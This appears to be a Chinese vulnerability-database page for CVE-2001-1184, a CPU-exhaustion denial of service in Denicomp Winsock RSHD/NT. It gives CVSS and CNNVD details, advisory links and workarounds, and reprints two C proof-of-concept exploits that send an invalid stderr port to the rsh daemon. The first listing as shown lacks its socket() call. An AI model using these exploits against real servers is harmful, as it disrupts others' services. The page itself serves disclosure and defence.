CVE-2001-1184
CVSS5.0
发布时间 :2001-12-08 00:00:00
修订时间 :2008-09-05 16:25:53
NMCOES    

[原文]wrshdsp.exe in Denicomp Winsock RSHD/NT 2.21.00 and earlier allows remote attackers to cause a denial of service (CPU consumption) via (1) in 2.20.00 and earlier, an invalid port number such as a negative number, which causes a connection attempt to that port and all ports below 1024, and (2) in 2.21.00, a port number of 1024.


[CNNVD]Denicomp Winsock RSHD/NT标准错误拒绝服务漏洞(CNNVD-200112-087)

        
        Winsock RSHD/NT是Windows NT和Windows 2000平台下的远程Shell守护程序,使用UNIX标准的rsh和rcp命令。
        Winsock RSHD/NT对意外情况的处理存在问题,可能使远程攻击者实施拒绝服务攻击。
        当连接到守护程序之后,rsh客户端将向守护程序提供一个端口供标准错误数据使用,如果该端口无效的话,Winsock RSHD/NT守护程序会试图连接该无效端口以及所有低于1024的端口(包含负的端口号),这将会量占用CPU资源,最终会导致拒绝服务。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:denicomp:winsock_rshd_nt:2.21
cpe:/a:denicomp:winsock_rshd_nt:2.20

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1184
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1184
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200112-087
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/3659
(VENDOR_ADVISORY)  BID  3659
http://www.securityfocus.com/archive/1/244580
(UNKNOWN)  BUGTRAQ  20011208 Winsock RSHD/NT 2.20.00 CPU overusage when invalid data is send
http://www.iss.net/security_center/static/7694.php
(VENDOR_ADVISORY)  XF  winsock-rshdnt-error-dos(7694)
http://www.denicomp.com/rshdnt.htm
(UNKNOWN)  CONFIRM  http://www.denicomp.com/rshdnt.htm
http://online.securityfocus.com/archive/1/245405
(UNKNOWN)  BUGTRAQ  20011213 WRSHDNT 2.21.00 CPU overusage

- 漏洞信息

Denicomp Winsock RSHD/NT标准错误拒绝服务漏洞
中危 其他
2001-12-08 00:00:00 2005-10-20 00:00:00
远程  
        
        Winsock RSHD/NT是Windows NT和Windows 2000平台下的远程Shell守护程序,使用UNIX标准的rsh和rcp命令。
        Winsock RSHD/NT对意外情况的处理存在问题,可能使远程攻击者实施拒绝服务攻击。
        当连接到守护程序之后,rsh客户端将向守护程序提供一个端口供标准错误数据使用,如果该端口无效的话,Winsock RSHD/NT守护程序会试图连接该无效端口以及所有低于1024的端口(包含负的端口号),这将会量占用CPU资源,最终会导致拒绝服务。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时停止运行该守护程序。
        厂商补丁:
        Denicomp
        --------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.denicomp.com/products.htm

- 漏洞信息 (21174)

Denicomp Winsock RSHD/NT Standard Error 2.20.00 Denial of Service Vulnerability (EDBID:21174)
windows dos
2001-12-10 Verified
0 jimmers
N/A [点击下载]
source: http://www.securityfocus.com/bid/3659/info

Winsock RSHD/NT is a Remote Shell Daemon for Windows NT and Windows 2000. It uses the standard Unix rsh and rcp commands. rsh (ie "remote shell") allows the execution of a non-interactive program on another system running the server component, 'rshd'. The daemon listens for connections coming from an rsh command through TCP/IP, and, on receiving a connection, validates access and executes the specified program.

Upon connecting to the daemon, rsh will supply a port number for the daemon to send standard error data. If the port number specified is invalid, Winsock RSHD/NT will attempt to connect to the invalid port and all port numbers below 1024 (including negative port numbers). Potentially consuming CPU resources and leading to a denial of service.

*
** WRSHDNT 2.20.00 CPU overusage demo
** jimmers@yandex.ru
*/

#define HOST    "localhost"
#define PORT    514

#include <stdio.h>
#include <winsock2.h>

int main(int argc, char * argv[]){
        SOCKET s;
        WSADATA WSAData;
        LPHOSTENT lpHostEnt;
        SOCKADDR_IN sockAddr;
        int res, on = 1;
        char *stderr_port = "-666";
        char *local_user  = "Administrator";
        char *remote_user = "root";
        char *cmd = "help";

        res = WSAStartup( MAKEWORD( 2, 2 ),
&WSAData);
        if(res != 0){
                res = WSAGetLastError();
                printf("WSAStartup() failed,
WSAGetLastError: %d\n", res);
                return 1;
        }

        lpHostEnt = gethostbyname(HOST);
        if(lpHostEnt == NULL){
                res = WSAGetLastError();
                printf("gethostbyname() failed,
WSAGetLastError: %d\n", res);
                WSACleanup();
                return 1;
        }

        sockAddr.sin_family     = AF_INET;
        sockAddr.sin_port       = htons(PORT);
        sockAddr.sin_addr       = *((LPIN_ADDR)
*lpHostEnt->h_addr_list);

        res = connect(s, (PSOCKADDR)
&sockAddr, sizeof(sockAddr));
        if(res != 0){
                res = WSAGetLastError();
                printf("connect() failed,
WSAGetLastError: %d\n", res);
                WSACleanup();
                return 1;
        }

        Sleep(400);
        res = send(s, stderr_port, strlen
(stderr_port)+1, 0);
        if(res == SOCKET_ERROR){
                res = WSAGetLastError();
                printf("send(stderr_port) failed,
WSAGetLastError: %d\n", res);
                WSACleanup();
                return 1;
        }

        printf("send(stderr_port): %d\n", res);

        Sleep(400);
        res = send(s, local_user, strlen(local_user)
+1, 0);
        if(res == SOCKET_ERROR){
                res = WSAGetLastError();
                printf("send(local_user) failed,
WSAGetLastError: %d\n", res);
                WSACleanup();
                return 1;
        }
        printf("send(local_user): %d\n", res);


        Sleep(400);
        res = send(s, remote_user, strlen
(remote_user)+1, 0);
        if(res == SOCKET_ERROR){
                res = WSAGetLastError();
                printf("send(remote_user) failed,
WSAGetLastError: %d\n", res);
                WSACleanup();
                return 1;
        }
        printf("send(remote_user): %d\n", res);


        Sleep(400);
        res = send(s, cmd, strlen(cmd)+1, 0);
        if(res == SOCKET_ERROR){
                res = WSAGetLastError();
                printf("send(cmd) failed,
WSAGetLastError: %d\n", res);
                WSACleanup();
                return 1;
        }
        printf("send(cmd): %d\n", res);

        WSACleanup();
        return 0;
}		

- 漏洞信息 (21175)

Denicomp Winsock RSHD/NT Standard Error 2.21.00 Denial of Service Vulnerability (EDBID:21175)
windows dos
2001-12-10 Verified
0 jimmers
N/A [点击下载]
source: http://www.securityfocus.com/bid/3659/info
 
Winsock RSHD/NT is a Remote Shell Daemon for Windows NT and Windows 2000. It uses the standard Unix rsh and rcp commands. rsh (ie "remote shell") allows the execution of a non-interactive program on another system running the server component, 'rshd'. The daemon listens for connections coming from an rsh command through TCP/IP, and, on receiving a connection, validates access and executes the specified program.
 
Upon connecting to the daemon, rsh will supply a port number for the daemon to send standard error data. If the port number specified is invalid, Winsock RSHD/NT will attempt to connect to the invalid port and all port numbers below 1024 (including negative port numbers). Potentially consuming CPU resources and leading to a denial of service.

/*
** WRSHDNT 2.21.00 CPU overusage demo
** jimmers@yandex.ru
*/

#define HOST    "localhost"
#define PORT    514

#include <stdio.h>
#include <winsock2.h>

int main(int argc, char * argv[]){
        SOCKET s;
        WSADATA WSAData;
        LPHOSTENT lpHostEnt;
        SOCKADDR_IN sockAddr;
        int res, on = 1;
        char *stderr_port = "1024";
        char *local_user  = "Administrator";
        char *remote_user = "root";
        char *cmd = "ver";

        res = WSAStartup(MAKEWORD( 2, 2 ),
&WSAData);
        if(res != 0){
                res = WSAGetLastError();
                printf("WSAStartup() failed,
WSAGetLastError: %d\n", res);
                return 1;
        }

        lpHostEnt = gethostbyname(HOST);
        if(lpHostEnt == NULL){
                res = WSAGetLastError();
                printf("gethostbyname() failed,
WSAGetLastError: %d\n", res);
                WSACleanup();
                return 1;
        }

        s = socket(AF_INET, SOCK_STREAM,
IPPROTO_TCP);
        if(s == INVALID_SOCKET){
                res = WSAGetLastError();
                printf("socket() failed,
WSAGetLastError: %d\n", res);
                WSACleanup();
                return 1;
        }

        sockAddr.sin_family     = AF_INET;
        sockAddr.sin_port       = htons(PORT);
        sockAddr.sin_addr       = *((LPIN_ADDR)
*lpHostEnt->h_addr_list);

        res = connect(s, (PSOCKADDR)
&sockAddr, sizeof(sockAddr));
        if(res != 0){
                res = WSAGetLastError();
                printf("connect() failed,
WSAGetLastError: %d\n", res);
                WSACleanup();
                return 1;
        }

        Sleep(400);
        res = send(s, stderr_port, strlen
(stderr_port)+1, 0);
        if(res == SOCKET_ERROR){
                res = WSAGetLastError();
                printf("send(stderr_port) failed,
WSAGetLastError: %d\n", res);
                WSACleanup();
                return 1;
        }
        printf("send(stderr_port): %d\n", res);

        Sleep(400);
        res = send(s, local_user, strlen(local_user)
+1, 0);
        if(res == SOCKET_ERROR){
                res = WSAGetLastError();
                printf("send(local_user) failed,
WSAGetLastError: %d\n", res);
                WSACleanup();
                return 1;
        }
        printf("send(local_user): %d\n", res);


        Sleep(400);
        res = send(s, remote_user, strlen
(remote_user)+1, 0);
        if(res == SOCKET_ERROR){
                res = WSAGetLastError();
                printf("send(remote_user) failed,
WSAGetLastError: %d\n", res);
                WSACleanup();
                return 1;
        }
        printf("send(remote_user): %d\n", res);


        Sleep(400);
        res = send(s, cmd, strlen(cmd)+1, 0);
        if(res == SOCKET_ERROR){
                res = WSAGetLastError();
                printf("send(cmd) failed,
WSAGetLastError: %d\n", res);
                WSACleanup();
                return 1;
        }
        printf("send(cmd): %d\n", res);

        WSACleanup();
        return 0;
}		

- 漏洞信息

14179
Denicomp Winsock RSHD/NT wrshdsp.exe Connection Command Invalid Port Number Parsing Remote DoS
Remote / Network Access Denial of Service
Loss of Availability Solution Unknown
Exploit Public Third-party Verified, Uncoordinated Disclosure

- 漏洞描述

- 时间线

2001-12-08 Unknow
2001-12-08 Unknow

- 解决方案

Upgrade to version 2.21.03 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Denicomp Winsock RSHD/NT Standard Error Denial of Service Vulnerability
Failure to Handle Exceptional Conditions 3659
Yes No
2001-12-10 12:00:00 2009-07-11 09:06:00
Discovered and posted to Bugtraq by martin rakhmanoff <jimmers@yandex.ru>.

- 受影响的程序版本

Denicomp Winsock RSHD/NT 2.21 (Intel)
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
Denicomp Winsock RSHD/NT 2.20 (Intel)
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0

- 漏洞讨论

Winsock RSHD/NT is a Remote Shell Daemon for Windows NT and Windows 2000. It uses the standard Unix rsh and rcp commands. rsh (ie "remote shell") allows the execution of a non-interactive program on another system running the server component, 'rshd'. The daemon listens for connections coming from an rsh command through TCP/IP, and, on receiving a connection, validates access and executes the specified program.

Upon connecting to the daemon, rsh will supply a port number for the daemon to send standard error data. If the port number specified is invalid, Winsock RSHD/NT will attempt to connect to the invalid port and all port numbers below 1024 (including negative port numbers). Potentially consuming CPU resources and leading to a denial of service.

- 漏洞利用

martin rakhmanoff &lt;jimmers@yandex.ru&gt; has provided the following exploit. 'WRSHDNTDoS.c' is for Winsock RSHD/NT 2.20 and 'WRSHDNTDoS2.21.c' is for Winsock RSHD/NT 2.21.

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站